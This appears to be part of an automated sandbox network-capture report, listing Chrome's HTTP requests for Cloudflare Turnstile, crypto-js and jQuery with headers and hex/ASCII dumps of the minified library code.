                                                          2025-01-09 20:12:15 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                          Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                          Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.449748104.17.25.144436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:15 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                          Host: cdnjs.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:15 UTC956INHTTP/1.1 200 OK
                                                          Date: Thu, 09 Jan 2025 20:12:15 GMT
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Access-Control-Allow-Origin: *
                                                          Cache-Control: public, max-age=30672000
                                                          ETag: W/"61182885-40eb"
                                                          Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                          cf-cdnjs-via: cfworker/kv
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Timing-Allow-Origin: *
                                                          X-Content-Type-Options: nosniff
                                                          CF-Cache-Status: HIT
                                                          Age: 111346
                                                          Expires: Tue, 30 Dec 2025 20:12:15 GMT
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojVpkpn5K7HEiyEs9U74W56Nj6rncTx6%2FDTTxAp4YYyvR9YHCevVgpvzD9nY8Wbbp7qyYjBL71%2FipjknzXV1OZ4nOWFnLNJIKiNJeRR12DoFKWobfOrYisr6l5saS2O1fNDiUZim"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                          Strict-Transport-Security: max-age=15780000
                                                          Server: cloudflare
                                                          CF-RAY: 8ff714c56d6c19cf-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-09 20:12:15 UTC413INData Raw: 37 62 66 35 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                          Data Ascii: 7bf5!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65
                                                          Data Ascii: lobalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73 29 74 72
                                                          Data Ascii: l(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)tr
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b 61 2b
                                                          Data Ascii: f t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 3f 31
                                                          Data Ascii: t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0?1
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d 3e 3e
                                                          Data Ascii: (r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]>>
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63
                                                          Data Ascii: .byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:func
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53
                                                          Data Ascii: At(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRS
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 2e 5f
                                                          Data Ascii: in(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this._
                                                          2025-01-09 20:12:15 UTC1369INData Raw: 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b 35 30
                                                          Data Ascii: =C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[50


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.449749151.101.194.1374436092C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-09 20:12:15 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                          Host: code.jquery.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-09 20:12:15 UTC613INHTTP/1.1 200 OK
                                                          Connection: close
                                                          Content-Length: 89501
                                                          Server: nginx
                                                          Content-Type: application/javascript; charset=utf-8
                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                          ETag: "28feccc0-15d9d"
                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          Via: 1.1 varnish, 1.1 varnish
                                                          Accept-Ranges: bytes
                                                          Date: Thu, 09 Jan 2025 20:12:15 GMT
                                                          Age: 1938061
                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740048-EWR
                                                          X-Cache: HIT, HIT
                                                          X-Cache-Hits: 2774, 1
                                                          X-Timer: S1736453536.662707,VS0,VE1
                                                          Vary: Accept-Encoding
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                          2025-01-09 20:12:15 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
